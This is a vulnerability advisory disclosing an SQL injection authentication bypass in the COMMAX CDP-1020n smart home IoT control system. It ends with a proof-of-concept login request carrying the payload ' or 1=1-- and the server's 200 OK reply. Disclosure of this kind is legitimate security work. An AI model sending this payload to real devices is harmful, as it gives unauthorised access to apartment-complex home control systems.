COMMAX Smart Home IoT Control System CDP-1020n SQL Injection Authentication Bypass Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: CDP-1020n 481 System Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety. Desc: The application suffers from an SQL Injection vulnerability. Input passed through the 'id' POST parameter in 'loginstart.asp' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. Tested on: Microsoft-IIS/7.5 ASP.NET Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5662 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5662.php 02.08.2021 -- POST /common/loginstart.asp?joincode={{truncated}} HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 37 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/mainstart.asp Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cookie: {} id=%27+or+1%3D1--&x=0&y=0&pass=waddup HTTP/1.1 200 OK Cache-Control: private Content-Length: 621 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: {} X-Powered-By: ASP.NET Date: Tue, 03 Aug 1984 22:57:56 GMT